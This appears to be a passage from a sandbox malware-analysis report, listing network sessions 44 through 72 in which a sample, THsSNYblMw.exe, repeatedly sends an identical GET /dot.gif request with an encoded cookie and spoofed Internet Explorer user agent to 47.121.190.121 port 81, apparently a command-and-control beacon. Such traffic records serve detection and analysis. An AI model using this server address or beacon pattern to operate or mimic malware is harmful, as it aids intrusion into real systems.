Jan 9, 2025 23:07:49.976809978 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:50.958440065 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49780	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:51.083826065 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:52.036262035 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49781	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:52.168386936 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:53.106275082 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49782	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:53.223790884 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:54.162743092 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:54.302391052 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:55.246228933 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49786	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:55.365223885 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49812	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:59.833643913 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:00.819166899 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49818	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:00.942228079 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:01.886778116 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49825	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:02.066632986 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:03.011859894 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49835	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:03.133083105 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:04.069070101 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49841	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:04.177412987 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:05.131822109 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49850	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:05.239620924 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:06.217329025 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49857	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:06.335422993 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:07.289119959 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49864	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:07.416624069 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:08.357172012 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49871	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:08.473718882 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:12.425225019 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49898	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:12.555202961 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:13.507934093 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49906	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:13.698776960 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:14.642699957 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49915	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:14.754780054 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:15.695023060 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49922	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:15.803208113 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:16.763417959 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49928	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:16.880197048 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:17.823348999 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49936	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:17.945480108 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:18.882231951 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49942	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:19.004863977 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:19.957854986 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49952	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:20.067790031 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:21.012429953 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49959	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:21.136523962 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:22.085259914 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49967	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:22.209881067 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:23.145281076 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49976	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:23.272284985 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:24.207060099 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49982	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:24.351865053 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:25.305530071 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49993	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:25.605814934 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:26.543025017 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49999	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:08:26.680701971 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:08:27.603636980 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:08:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50006	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
